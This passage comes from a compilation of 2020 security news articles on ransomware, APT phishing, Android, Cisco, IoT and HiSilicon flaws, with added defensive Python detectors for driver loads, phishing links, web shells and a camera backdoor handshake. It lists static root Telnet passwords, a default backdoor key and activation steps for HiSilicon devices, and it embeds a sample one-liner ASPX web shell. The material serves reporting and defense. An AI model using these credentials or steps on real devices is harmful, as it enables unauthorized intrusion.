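From a detection standpoint, the chain above collapses into two driver-load events on the same host: a legitimately signed but known-vulnerable driver (GDRV.SYS, CVE-2018-19320) followed shortly by an unsigned driver (RBNL.SYS) that signature enforcement should have refused. The Python below is an added example, not code from Sophos, that looks for exactly that pattern in driver-load telemetry shaped like Sysmon Event ID 6 (Driver loaded). The host names, timestamps, paths and signer strings in the sample records are constructed for the example; only the two driver file names and the CVE come from the article.

```python
"""Spot a 'bring your own vulnerable driver' chain in driver-load events."""
import ntpath

# Driver file names from the Sophos write-up; matched by basename, case-insensitively.
KNOWN_VULNERABLE_DRIVERS = {"gdrv.sys": "CVE-2018-19320"}
KNOWN_MALICIOUS_DRIVERS = {"rbnl.sys"}

# Constructed sample events mimicking Sysmon Event ID 6 fields (not real telemetry).
CONSTRUCTED_EVENTS = [
    {"Computer": "ws01.corp.example", "UtcTime": "2020-01-20 03:14:02.000",
     "ImageLoaded": r"C:\Windows\System32\drivers\ntfs.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"Computer": "ws01.corp.example", "UtcTime": "2020-01-20 03:15:40.000",
     "ImageLoaded": r"C:\Windows\Temp\GDRV.SYS",
     "Signed": "true", "Signature": "Giga-Byte Technology Co., Ltd.", "SignatureStatus": "Valid"},
    {"Computer": "ws01.corp.example", "UtcTime": "2020-01-20 03:15:41.000",
     "ImageLoaded": r"C:\Windows\Temp\RBNL.SYS",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    {"Computer": "ws02.corp.example", "UtcTime": "2020-01-20 03:20:00.000",
     "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]


def _basename(path):
    # ntpath handles backslash paths regardless of the platform the analysis runs on.
    return ntpath.basename(path).lower()


def analyze_driver_loads(records):
    """Return findings (oldest first per host) for known-vulnerable, known-malicious,
    and unsigned driver loads; an unsigned load that follows a vulnerable signed load
    on the same host is reported as a 'byovd_chain'."""
    findings = []
    vulnerable_seen = {}  # host -> first record of a known-vulnerable driver load
    for rec in sorted(records, key=lambda r: (r["Computer"], r["UtcTime"])):
        host = rec["Computer"]
        name = _basename(rec["ImageLoaded"])
        signed_ok = rec["Signed"].lower() == "true" and rec["SignatureStatus"] == "Valid"

        if name in KNOWN_VULNERABLE_DRIVERS:
            vulnerable_seen.setdefault(host, rec)
            findings.append({"kind": "known_vulnerable_driver", "host": host,
                             "driver": name, "ref": KNOWN_VULNERABLE_DRIVERS[name]})
        if name in KNOWN_MALICIOUS_DRIVERS:
            findings.append({"kind": "known_malicious_driver", "host": host, "driver": name})
        if not signed_ok:
            prior = vulnerable_seen.get(host)
            kind = "byovd_chain" if prior and rec["UtcTime"] >= prior["UtcTime"] else "unsigned_driver"
            findings.append({"kind": kind, "host": host, "driver": name,
                             "after": _basename(prior["ImageLoaded"]) if prior else None})
    return findings


if __name__ == "__main__":
    for f in analyze_driver_loads(CONSTRUCTED_EVENTS):
        print(f)
```

Two design points worth noting: the vulnerable-driver lookup is a tiny allow/deny list here, but in practice it should be fed from a maintained catalogue of known-abused signed drivers, and an unsigned driver load is itself a high-severity finding even without a preceding vulnerable load, since on a default Windows install it should not be possible at all.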

“In this attack scenario, the criminals have used the Gigabyte driver as a wedge so they could load a second, unsigned driver into Windows,” continues the Sophos report. “This second driver then goes to great lengths to kill processes and files belonging to endpoint security products, bypassing tamper protection, to enable the ransomware to attack without interference.”

In the attacks observed by Sophos, the operators deployed an executable named Steel.exe that exploits the CORE-2018-0007 vulnerability in the GIGABYTE gdrv.sys driver.

Experts pointed out that the Steel.exe program terminates processes whose files are listed in a file called PLIST.TXT; unfortunately Sophos had no access to that file and was not able to determine which security solutions are being targeted.

Once the Steel.exe has terminated security software, the RobbinHood ransomware will encrypt files on the infected systems.

Technical details about the attacks are reported in the report published by Sophos, including Indicators of Compromise (IoCs).


Japanese defense contractors Pasco and Kobe Steel disclose security breaches

Japanese defense contractors Pasco and Kobe Steel have disclosed security breaches that they suffered back in 2016 and 2018.

Pasco is Japan's largest geospatial provider and Kobe Steel is one of the country's major steel manufacturers. Just last week, Japan's Ministry of Defense announced that, in addition to Mitsubishi Electric and NEC's defense business division, two other unnamed contractors had suffered a data breach.

The Japanese Defense Minister Taro Kono said during a press conference on January 31 that four defense suppliers were hacked between 2016 and 2019.

After the announcement, both Pasco and Kobe Steel disclosed the incidents. While Pasco declared that it had found no evidence that personal or business information had been stolen by the attackers, Kobe confirmed that some files may have been exfiltrated.

Kobe identified unauthorized access to its network in August 2016 and in June 2017, while Pasco detected the intrusion in May 2018.

However, contrary to what Kobe declared in its official statement, the Nikkei website reports that the hackers accessed 250 files containing data related to the Ministry of Defense and personal information.

The Japanese Defense Minister Taro Kono added that there is no evidence that the attacks are related to each other.

In January, Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months earlier, on June 28, 2019; the delay in disclosure was attributed to the increased complexity of the investigation caused by the attackers deleting activity logs.

Two Japanese media outlets attributed the cyber attack to a China-linked cyber espionage group tracked as Tick (aka Bronze Butler).

The hacker group has been targeting Japanese heavy industry, manufacturing and international relations since at least 2012.

According to the experts, the group is linked to the People’s Republic of China and is focused on exfiltrating confidential data. The attackers have exploited a directory traversal and arbitrary file upload vulnerability, tracked as CVE-2019-18187, in the Trend Micro OfficeScan antivirus.

“According to people involved, Chinese hackers Tick may have been involved. According to Mitsubishi Electric, ‘logs (to check for leaks) have been deleted and it is not possible to confirm whether or not they actually leaked.’” reported the Nikkei.

“According to the company, at least tens of PCs and servers in Japan and overseas have been found to have been compromised. The amount of unauthorized access is approximately 200 megabytes, mainly for documents.”

A few days later, the IT giant NEC confirmed that its defense business division had suffered a security breach back in December 2016.

The Japanese firm confirmed the unauthorized access to its internal network after Japanese newspapers disclosed the security incident citing sources informed of the event.

NEC is a contractor for Japan’s defense industry and was involved in various defense projects.

Roughly 28,000 files were found by the company on one of the compromised servers, some of them containing info about defense equipment.

Experts believe that the attacks on Japanese defense contractors were part of a cyber espionage campaign carried out by Chinese hackers.


Iran-linked APT group Charming Kitten targets journalists, political and human rights activists

Iran-linked APT group Charming Kitten has been targeting journalists, political and human rights activists in a new campaign.

Researchers from Certfa Lab have spotted a new cyber espionage campaign carried out by the Iran-linked APT group Charming Kitten, targeting journalists, political and human rights activists.

The Iran-linked Charming Kitten group (aka APT35, Phosphorus, Newscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011 targeting journalists and activists in the Middle East, as well as organizations in the United States, and entities in the U.K., Israel, Iraq, and Saudi Arabia.

The campaign uncovered by Certfa Lab is related to previously observed targeted attacks against a U.S. candidate, government officials, and expatriate Iranians.

“Certfa Lab has identified a new series of phishing attacks from the Charming Kitten, the Iranian hacking group who has a close relationship with Iran’s state and Intelligence services. According to our investigation, these new attacks have targeted journalists, political and human rights activists.” reads the post published by Certfa Lab. “These phishing attacks are in line with the previous activities of the group that companies like ClearSky and Microsoft have reported in detail in September and October 2019.”

The Iranian hackers are still focused on targeting private and government institutions, think tanks and academic institutions, organizations with ties to the Baha'i community, and many others in European countries, the United States, the United Kingdom, and Saudi Arabia.

The attackers created a fake account impersonating New York Times journalist Farnaz Fassihi (formerly of the Wall Street Journal (WSJ)) to send fake interview proposals or webinar invitations to the targeted individuals and trick them into visiting phishing websites.

The spear-phishing messages use links in the footnotes, including social media links and links to the WSJ and Dow Jones websites, all in short-URL format. When the victims click on them, they are redirected to the legitimate addresses while basic information about the victim's device (i.e. IP address, operating system, and browser) is collected, which could be used to prepare the attack against the victim's devices.

Then the attackers send a link to a page containing interview questions, hosted on Google Sites, a common trick to evade detection.

Once the victim clicks the download button on the Google Sites page, they are redirected to another fake page on the two-step-checkup[.]site domain, where the login credentials for their email, such as the password and two-factor authentication (2FA) code, are requested.


The attackers employed a backdoor named “pdfreader.exe,” which was first uploaded to VirusTotal by an anonymous user on 3 October 2019. The malware gathers victim device data and achieves persistence through modified Windows Firewall and Registry settings. Experts pointed out that the malware is linked to the operators behind past Charming Kitten campaigns.

“The similarities between the method of managing and sending HTTP requests in “two-step-checkup[.]site” server with the latest techniques used by this group is further evidence of Charming Kitten’s connection to these attacks.” continues the report. “In this technique, if sent requests to the host server of the phishing kit are denied, the user is directed to a legitimate website like Google, Yahoo!, or Outlook by “301 Moved Permanently” and “Found redirect 302” responses. As a result, this method makes it harder for different pages and sections of phishing websites to be exposed to the public.”
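The three link types in the lure described above (shortened links whose redirect fingerprints the reader, a questions page on Google Sites, and a credential page on an unrelated domain) are all things a mail-security or SOC triage script can pull apart before anyone clicks. The Python below is an added example written for this article, not Certfa's tooling. It extracts every URL from a message (refanging `hxxp` and `[.]` first, since analysts often paste defanged indicators), then labels each host as a public shortener, a free-hosting platform, a host under the domains the sender claims to represent, or an unrelated external host. The message text, the t.co and Google Sites paths, and the shortener list are constructed assumptions; the two-step-checkup[.]site domain is the one named in the article.

```python
"""Triage the links in a suspicious message: shorteners, free hosting, sender-domain mismatch."""
import re
from urllib.parse import urlsplit

# Matches both live and defanged (hxxp, [.]) URLs; trailing punctuation is trimmed afterwards.
URL_RE = re.compile(r"(?i)\b(?:https?|hxxps?)://[^\s<>\"')]+")
SHORTENER_HOSTS = {"t.co", "bit.ly", "tinyurl.com", "goo.gl", "ow.ly"}  # common public shorteners
FREE_HOSTING_HOSTS = {"sites.google.com"}                               # platform named in the article

# Constructed lure in the style the article describes (not a real message).
CONSTRUCTED_MESSAGE = """\
Dear colleague, I would like to interview you for an upcoming piece.
Questions: https://sites.google.com/view/interview-questions-2019
Reference: https://www.wsj.com/news/world
Follow me: https://t.co/AbCdEf123
Verify your mailbox to download: hxxps://two-step-checkup[.]site/login
"""


def refang(url):
    """Turn analyst-defanged notation back into a parseable URL."""
    return re.sub(r"(?i)^hxxp", "http", url).replace("[.]", ".")


def registrable(host):
    """Crude registrable-domain approximation (last two labels); enough for this example."""
    return ".".join(host.lower().split(".")[-2:])


def triage_links(message, claimed_domains):
    """Return [(raw_url, host, verdict)] for every URL in `message`.

    claimed_domains: registrable domains the sender purports to belong to, e.g. {"wsj.com"}.
    verdict is one of 'shortener', 'free_hosting', 'claimed_org', 'external'.
    """
    claimed = {d.lower() for d in claimed_domains}
    results = []
    for raw in URL_RE.findall(message):
        url = refang(raw.rstrip(".,;:"))
        host = (urlsplit(url).hostname or "").lower()
        if host in SHORTENER_HOSTS:
            verdict = "shortener"      # destination hidden; the redirect hop can fingerprint the reader
        elif host in FREE_HOSTING_HOSTS:
            verdict = "free_hosting"   # legitimate platform, so reputation checks pass; inspect content
        elif registrable(host) in claimed:
            verdict = "claimed_org"
        else:
            verdict = "external"       # not associated with who the sender claims to be
        results.append((raw, host, verdict))
    return results


if __name__ == "__main__":
    for raw, host, verdict in triage_links(CONSTRUCTED_MESSAGE, {"nytimes.com", "wsj.com", "dowjones.com"}):
        print(f"{verdict:12} {host:28} {raw}")
```

The point of the "claimed_org" check is that a message from a journalist at a known outlet has an obvious set of domains its links should live on; anything else, and a shortener in particular, deserves expansion in a sandbox rather than a click. The credential page is caught here purely by being off-domain, which is deliberate: the article notes the kit hides behind 301/302 redirects to legitimate sites, so content-based checks alone would likely see nothing suspicious.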

The recently discovered phishing attacks by Charming Kitten are in line with the group’s previous activity. Certfa speculates that the APT group is developing a series of malware for its future phishing campaigns.

“The Charming Kitten used Google Sites for their phishing attack, and Certfa believes that they work on the development of a series of malware for their future phishing attack campaign.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, APT)

Critical Android Bluetooth flaw CVE-2020-0022 could be exploited without user interaction

Google addressed a critical vulnerability in its Android OS that affects the Bluetooth subsystem and could be exploited without user interaction.

Google has addressed a critical flaw in Android OS that affects the Bluetooth subsystem and could be exploited without user interaction.

The vulnerability, tracked as CVE-2020-0022, is a remote code execution flaw that could allow attackers to execute code on the device with the elevated privileges of the Bluetooth daemon while the wireless module is active. The critical vulnerability impacts Android Oreo (8.0 and 8.1) and Pie (9); on Android 10 it is not exploitable for code execution for technical reasons and only triggers a DoS condition in the Bluetooth daemon.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process.” reads the security bulletin published by Android.

The flaw was reported to Google by Jan Ruge from the Technische Universität Darmstadt, Secure Mobile Networking Lab.

The risk posed by this kind of vulnerability is that it could be used to implement ‘wormable’ behavior in mobile malware, which could rapidly spread from one infected device to another device in its proximity that is reachable via Bluetooth.

The issue could be exploited only if the attacker knows the Bluetooth MAC address of the target, but this is quite easy to retrieve.

“On Android 8.0 to 9.0, a remote attacker within proximity can silently execute arbitrary code with the privileges of the Bluetooth daemon as long as Bluetooth is enabled.” the researcher wrote in a blog post on the site of the IT security consultancy ERNW. “No user interaction is required and only the Bluetooth MAC address of the target devices has to be known. For some devices, the Bluetooth MAC address can be deduced from the WiFi MAC address. This vulnerability can lead to theft of personal data and could potentially be used to spread malware (Short-Distance Worm).”

To mitigate the flaw, Ruge recommends disabling Bluetooth and enabling it only “if strictly necessary.” If Bluetooth must be active, it is recommended to keep the device non-discoverable except when pairing with other devices.

Android users should apply the latest security patches as soon as possible.

Pierluigi Paganini

(SecurityAffairs – Android, hacking)

cdpwn – Millions of devices at risk due to flaws in implementations of Cisco Discovery Protocol (CDP)

A set of vulnerabilities in the Cisco Discovery Protocol (CDP) exposes tens of millions of devices to the risk of cyber attacks.

Researchers at the IoT security firm Armis discovered a set of five serious vulnerabilities in implementations of the Cisco Discovery Protocol (CDP). The experts tracked the set as CDPwn and warned that the issues could be exploited by attackers to take complete control of vulnerable devices.

“Armis has discovered five critical, zero-day vulnerabilities in various implementations of the Cisco Discovery Protocol (CDP) that can allow remote attackers to completely take over devices without any user interaction. CDP is a Cisco proprietary Layer 2 (Data Link Layer) network protocol that is used to discover information about locally attached Cisco equipment.” reads the advisory published by Armis. “CDP is implemented in virtually all Cisco products including switches, routers, IP phones and cameras. All those devices ship from the factory with CDP enabled by default. The CERT Coordination Center has also issued an advisory.”

Cisco Discovery Protocol (CDP) is a proprietary Data Link Layer protocol developed by Cisco Systems in 1994 that is used to share information about other directly connected Cisco equipment, including the operating system version and IP address.

The protocol is used by Cisco network equipment (switches, routers), IP phones, and cameras.

Four of the CDPwn vulnerabilities are remote code execution (RCE) flaws; the fifth is a Denial of Service (DoS) flaw. An attacker can exploit them only after gaining access to the target network, by sending specially crafted CDP packets to the targeted device.

An attacker could exploit the RCE vulnerabilities to break network segmentation, to exfiltrate corporate network traffic traversing an organization’s switches and routers, to gain access to additional devices through man-in-the-middle attacks by intercepting and altering traffic on the corporate switch, and to exfiltrate sensitive information such as phone calls from IP phones and video feeds from IP cameras.

The code execution vulnerabilities affect the NX-OS, IOS XR, IP phone, and IP camera implementations, while the DoS flaw impacts the FXOS, IOS XR and NX-OS implementations of CDP.

Armis researchers presented several attack scenarios, such as breaking network segmentation and exfiltrating data from devices like IP phones and cameras.

Cisco has published security advisories and released patches to address the issues. The flaws are tracked as CVE-2020-3120, CVE-2020-3119, CVE-2020-3118, CVE-2020-3111 and CVE-2020-3110 and received a high severity rating.

Pierluigi Paganini

(SecurityAffairs – cdpwn cdp flaws, hacking)

Hacking Wi-Fi networks by exploiting a flaw in Philips Smart Light Bulbs

Check Point experts discovered a high-severity flaw in Philips Hue Smart Light Bulbs that can be exploited to gain entry into a targeted WiFi network.

Security experts from Check Point discovered a high-severity flaw (CVE-2020-6007) in Philips Hue Smart Light Bulbs that can be exploited by hackers to gain entry into a targeted WiFi network.

Smart lightbulbs can be remotely controlled through a mobile app or a digital home assistant: owners can control the lighting in a room and even calibrate the color of each bulb. The bulbs are managed over the air via WiFi or ZigBee, a low-bandwidth radio protocol.

Check Point experts demonstrated that it is possible to trigger the issue in Philips Hue Smart Light Bulbs over the air from more than 100 meters away.

The CVE-2020-6007 flaw is tied to the way Philips implemented the Zigbee communication protocol in its smart light bulb and can lead to a heap-based buffer overflow.

ZigBee is an IEEE 802.15.4-based specification for a suite of high-level communication protocols used to create personal area networks with small, low-power digital radios, such as for home automation, medical device data collection, and other low-power low-bandwidth needs, designed for small scale projects which need wireless connection.

The buffer overflow occurs in the “bridge” component that accepts remote commands sent to the bulb over Zigbee protocol from other devices such as a mobile app.

“Check Point’s researchers showed how a threat actor could exploit an IoT network (smart lightbulbs and their control bridge) to launch attacks on conventional computer networks in homes, businesses or even smart cities.” reads the report published by Check Point. “Our researchers focused on the market-leading Philips Hue smart bulbs and bridge, and found vulnerabilities (CVE-2020-6007) that enabled them to infiltrate networks using a remote exploit in the ZigBee low-power wireless protocol that is used to control a wide range of IoT devices.”

The researchers did not reveal technical details or a PoC exploit for the vulnerability, to give users time to patch their systems.

The researchers published a video that shows how they exploited the vulnerabilities in the Philips Hue bridge to compromise a target computer network and then attack a computer on it using the EternalBlue exploit.

Below is the attack chain shown in the video PoC:

  1. The attacker takes control of the smart bulb by exploiting a vulnerability in smart light bulbs discovered in 2017.
  2. The device is no longer ‘reachable’ in the user’s control app, tricking the user into resetting the bulb and then instructing the control bridge to re-discover it.
  3. The bridge discovers the attacker-controlled bulb with updated firmware, and the user adds it back onto their network.
  4. The attacker exploits vulnerabilities in the ZigBee protocol to trigger a heap-based buffer overflow on the control bridge and installs malicious code on the bridge, which is connected to the targeted network.
  5. The malware can then move laterally and infect other systems in the target network.

“Many of us are aware that IoT devices can pose a security risk, but this research shows how even the most mundane, seemingly ‘dumb’ devices such as lightbulbs can be exploited by hackers and used to take over networks, or plant malware.” explained Yaniv Balmas, head of cyber research at Check Point. “It’s critical that organizations and individuals protect themselves against these possible attacks by updating their devices with the latest patches and separating them from other machines on their networks, to limit the possible spread of malware. In today’s complex fifth-generation attack landscape, we cannot afford to overlook the security of anything that is connected to our networks.”

Check Point reported the issue to Philips and Signify (owner of the Philips Hue brand) in November 2019. The company released firmware patches for the device in January.

Pierluigi Paganini

(SecurityAffairs – Smart Light Bulbs, hacking)

Microsoft detects 77,000 active web shells on a daily basis

Microsoft published an interesting report that investigates web shell attacks; the IT giant says it detects 77,000 active web shells daily.

According to a report published by Microsoft, the company detects an average of 77,000 active web shells, spread across 46,000 infected servers, on a daily basis.

A web shell is code, often written in typical web development languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to gain remote access and code execution.

Microsoft observed several threat groups, including ZINC, KRYPTON, and GALLIUM, using these malicious scripts in their campaigns. Threat actors typically exploit known issues in web applications to compromise web servers and install web shells. One of the most widely adopted web shells is China Chopper, which was employed in numerous cyberespionage campaigns carried out by China-linked APT groups.

In October 2018, security agencies of the Five Eyes alliance (United States, United Kingdom, Canada, Australia and New Zealand) released a joint report that details some popular hacking tools, including China Chopper.

77,000 detections a day is a worrisome figure and gives an indication of the intensity of threat actor activity in cyberspace.

“Unfortunately, these gaps appear to be widespread, given that every month, Microsoft Defender Advanced Threat Protection (ATP) detects an average of 77,000 web shell and related artifacts on an average of 46,000 distinct machines.” reads the report published by Microsoft.

“Because web shells are a multi-faceted threat, enterprises should build comprehensive defenses for multiple attack surfaces.” concludes Microsoft. “Gaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. The installation of web shells can be detected by monitoring web application directories for web script file writes. Applications such as Outlook Web Access (OWA) rarely change after they have been installed and script writes to these application directories should be treated as suspicious.”
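The file-write monitoring Microsoft recommends can be approximated with a baseline-and-diff check over the application directory. The following is an added example, not code from Microsoft’s report: it hashes every script file under a web application directory, reports new, modified or deleted scripts on the next pass, and runs a few constructed content heuristics (the `eval(Request...` form of one-liner ASPX shells among them) over the files it flags. The OWA-style directory layout and the dropped `errorFF.aspx` file are constructed sample data.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Script types a web server will execute; a write of one of these into an
# application directory that "rarely changes" is the event worth alerting on.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp", ".cshtml"}

# Constructed heuristics: code constructs common in web shells. A hit is a
# reason to inspect the file, not proof of compromise.
SUSPICIOUS_PATTERNS = [
    re.compile(rb"eval\s*\(\s*Request", re.I),                     # one-liner ASP/ASPX shells
    re.compile(rb"Request\.Item\[", re.I),
    re.compile(rb"(system|exec|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST)", re.I),
    re.compile(rb"base64_decode\s*\(", re.I),
]


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(app_dir) -> dict:
    """Map relative path -> sha256 for every script file under app_dir."""
    root = Path(app_dir)
    manifest = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXTENSIONS:
            manifest[p.relative_to(root).as_posix()] = sha256_of(p)
    return manifest


def scan_for_script_writes(app_dir, baseline: dict) -> list:
    """Diff the directory against a known-good baseline and return findings.

    Each finding carries the event type (new_script / modified_script /
    deleted_script), the current hash and which heuristics matched the content.
    """
    root = Path(app_dir)
    current = build_manifest(app_dir)
    findings = []
    for rel, digest in current.items():
        if rel not in baseline:
            event = "new_script"
        elif baseline[rel] != digest:
            event = "modified_script"
        else:
            continue  # unchanged since baseline: nothing to report
        data = (root / rel).read_bytes()
        hits = [pat.pattern.decode() for pat in SUSPICIOUS_PATTERNS if pat.search(data)]
        findings.append({"path": rel, "event": event, "sha256": digest, "suspicious": hits})
    for rel in baseline:
        if rel not in current:
            findings.append({"path": rel, "event": "deleted_script",
                             "sha256": baseline[rel], "suspicious": []})
    return findings


def demo() -> list:
    """Constructed scenario: baseline an OWA-like tree, then drop a shell and tamper a page."""
    with tempfile.TemporaryDirectory() as tmp:
        owa = Path(tmp) / "owa"
        (owa / "auth").mkdir(parents=True)
        (owa / "auth" / "logon.aspx").write_text('<%@ Page Language="C#" %><html>logon</html>')
        (owa / "default.aspx").write_text('<%@ Page Language="C#" %><html>ok</html>')
        baseline = build_manifest(owa)  # taken right after a clean install

        # Constructed sample modelled on the one-liner ASPX shell form.
        (owa / "auth" / "errorFF.aspx").write_text(
            '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>')
        # An existing page rewritten in place: modified, but no heuristic hit.
        (owa / "default.aspx").write_text('<%@ Page Language="C#" %><html>changed</html>')
        return scan_for_script_writes(owa, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```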

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

Expert released PoC exploit code for unpatched backdoor in HiSilicon chips

A researcher published details about a backdoor mechanism he found in HiSilicon chips, but he did not report it to the vendor due to a lack of trust in it.

The Russian security expert Vladislav Yarmak has published technical details about a backdoor mechanism he discovered in HiSilicon chips.

The backdoor mechanism could allow attackers to gain root shell access and full control of the device. The expert also published proof-of-concept code for the vulnerability.

The expert did not disclose the flaw to HiSilicon because he did not trust the vendor to address the issue.

HiSilicon is a Chinese fabless semiconductor company based in Shenzhen and owned by Huawei; it is the largest domestic designer of integrated circuits in China, and its chips are used in millions of IoT devices worldwide, including security cameras, DVRs, and NVRs.

The presence of backdoor mechanisms in HiSilicon chips had already been documented by other experts in the past.

Earlier versions of the devices had Telnet access enabled with a static root password that can be recovered with (relatively) little computation effort.

More recent firmware versions had Telnet access and the debug port (9527/tcp) disabled by default, but they had port 9530/tcp open, which could be abused by attackers to send a special command that starts the Telnet daemon and enables shell access with a static password ([1], [2], [3]).

“Most recent firmware versions have open port 9530/tcp listening for special commands, but require cryptographic challenge-response authentication for them to be committed. This is a subject of actual disclosure.” reads the post published by Yarmak.

“Apparently, all these years HiSilicon was unwilling or incapable to provide adequate security fixes for same backdoor which, by the way, was implemented intentionally.”

Yarmak explained that the backdoor can be activated by sending a series of commands over TCP port 9530 to devices based on HiSilicon chips. The commands enable the Telnet service on a vulnerable device; the attacker can then log in with one of the following six Telnet credentials and gain access to the root account.

Login    Password
root     xmhdipc
root     klv123
root     xc3511
root     123456
root     jvbzd
root     hi3518

Below is the backdoor activation process described by the expert:

  1. Client opens connection to port TCP port 9530 of device and sends string OpenTelnet:OpenOnce prepended with byte indicating total message length. This step is last for previous versions of backdoor. Probably telnetd was already started if there is no response after this step.
  2. Server (device) answers with string randNum:XXXXXXXX where XXXXXXXX is 8-digit random decimal number.
  3. Client uses its pre-shared key and constructs encryption key as concatenation of received random number and PSK.
  4. Client encrypts random number with encryption key and sends it after string randNum:. Entire message is prepended with byte indicating total length of message.
  5. Server loads same pre-shared key from file /mnt/custom/TelnetOEMPasswd or uses default key 2wj9fsa2 if file is missing.
  6. Server performs encryption of random number and verifies result is identical with string from client. On success server sends string verify:OK or verify:ERROR otherwise.
  7. Client encrypts string Telnet:OpenOnce, prepends it with total length byte, CMD: string and sends to server.
  8. Server extracts and decrypts received command. If decryption result is equal to string Telnet:OpenOnce it responds with Open:OK, enables debug port 9527 and starts telnet daemon.
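For defenders who can capture traffic to these devices, the handshake above has fixed markers in both directions. The following added example is not Yarmak’s PoC (which implements the client side); it only classifies a captured session to port 9530/tcp by the activation stages it contains. The session bytes are constructed, the placeholder ciphertext stands in for the encryption the write-up does not specify, and the `frame()` length-byte convention is an assumption.

```python
import re

BACKDOOR_PORT = 9530  # command port from the write-up; 9527/tcp is the debug port it opens

# Handshake markers quoted in the write-up, keyed by stage. The length byte that
# prefixes each client message is deliberately ignored: substring matching works
# whether or not that byte counts itself.
CLIENT_MARKERS = {
    "probe": b"OpenTelnet:OpenOnce",  # step 1: unauthenticated request (older firmware stops here)
    "response": b"randNum:",          # step 4: client's encrypted answer to the challenge
    "command": b"CMD:",               # step 7: encrypted Telnet:OpenOnce command
}
SERVER_MARKERS = {
    "challenge": re.compile(rb"randNum:(\d{8})"),  # step 2: 8-digit decimal nonce
    "verify_ok": re.compile(rb"verify:OK"),         # step 6: challenge accepted
    "verify_error": re.compile(rb"verify:ERROR"),   # step 6: challenge rejected
    "opened": re.compile(rb"Open:OK"),              # step 8: telnetd started
}


def analyze_session(client_to_server: bytes, server_to_client: bytes) -> dict:
    """Classify one TCP session to port 9530 from the bytes seen in each direction.

    Verdicts:
      clean          - no backdoor markers at all
      probe_seen     - activation attempted but no accepted challenge seen (older
                       firmware may have started telnetd silently here, so still alert)
      failed_auth    - server issued a challenge and rejected the response
      authenticated  - server accepted the response but Open:OK was not seen
      telnet_enabled - Open:OK seen: the device has started its Telnet daemon
    """
    stages = [stage for stage, marker in CLIENT_MARKERS.items() if marker in client_to_server]
    nonce = None
    for stage, pattern in SERVER_MARKERS.items():
        m = pattern.search(server_to_client)
        if m:
            stages.append(stage)
            if stage == "challenge":
                nonce = m.group(1).decode()

    if "opened" in stages:
        verdict = "telnet_enabled"
    elif "verify_ok" in stages:
        verdict = "authenticated"
    elif "verify_error" in stages:
        verdict = "failed_auth"
    elif stages:
        verdict = "probe_seen"
    else:
        verdict = "clean"
    return {"port": BACKDOOR_PORT, "stages": stages, "nonce": nonce, "verdict": verdict}


def frame(payload: bytes) -> bytes:
    """Prefix a client message with its length byte, as the write-up describes.

    Assumption (not stated in the write-up): the byte counts the bytes that follow it.
    """
    return bytes([len(payload)]) + payload


# Constructed sample session: a complete activation. The 0xAA/0xBB runs are
# placeholder ciphertext; the cipher is not needed to recognise the handshake.
SAMPLE_CLIENT = (
    frame(b"OpenTelnet:OpenOnce")
    + frame(b"randNum:" + b"\xaa" * 16)
    + frame(b"CMD:" + b"\xbb" * 16)
)
SAMPLE_SERVER = b"randNum:12345678" + b"verify:OK" + b"Open:OK"

if __name__ == "__main__":
    print(analyze_session(SAMPLE_CLIENT, SAMPLE_SERVER))
```

On a sensor, the same function would be applied to the reassembled payload of each flow whose server port is 9530; any verdict other than `clean` is worth an alert given the write-up's recommendation to restrict network access to these devices entirely.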

Yarmak pointed out that although the presence of the backdoor mechanism had been reported by experts in the past, the vendor never properly addressed it and only opted to disable the Telnet service.

The bad news for users is that, even though no patch is currently available for the backdoor, the expert decided to publish proof-of-concept (PoC) code.

“Taking into account earlier bogus fixes for that vulnerability (backdoor, actually) it is not practical to expect security fixes for firmware from [the] vendor,” Yarmak concludes. “Owners of such devices should consider switching to alternatives.”

As mitigation, users are recommended to “completely restrict network access to these devices to trusted users.”

According to the expert, there are dozens of brands and hundreds of models vulnerable to this attack; he referred to previous research by another researcher that listed some of the vulnerable brands.

Pierluigi Paganini

(SecurityAffairs – HiSilicon chips, hacking)

Dropbox paid more than $1 Million via its bug bounty program

File hosting service company Dropbox paid out $1 million for vulnerabilities reported by researchers through its bug bounty program.

Since the launch of its bug bounty program in 2014, the file-hosting company Dropbox has paid out $1 million to date for vulnerabilities reported by researchers.

“Our bug bounty program recently passed a significant milestone. Since launching our program in 2014 and tripling our bounties in 2017, we’ve given more than $1,000,000 to bug bounty participants for valid findings submitted to our program.” reads the post published by DropBox. “Not only has Dropbox benefitted from our bug bounty program, but so have some of our most critical vendors who have remained active participants in our program.”

Currently, the bug bounty program covers the company’s websites, the Paper collaborative workspace service, and both desktop and mobile applications.

Researchers who report vulnerabilities in Dropbox software can earn more than $32,000 for critical remote code execution flaws on company servers.

Dropbox paid over $318,000 via the HackerOne platform for nearly 300 vulnerabilities, and $336,479 at a live hacking event held in Singapore in 2019.

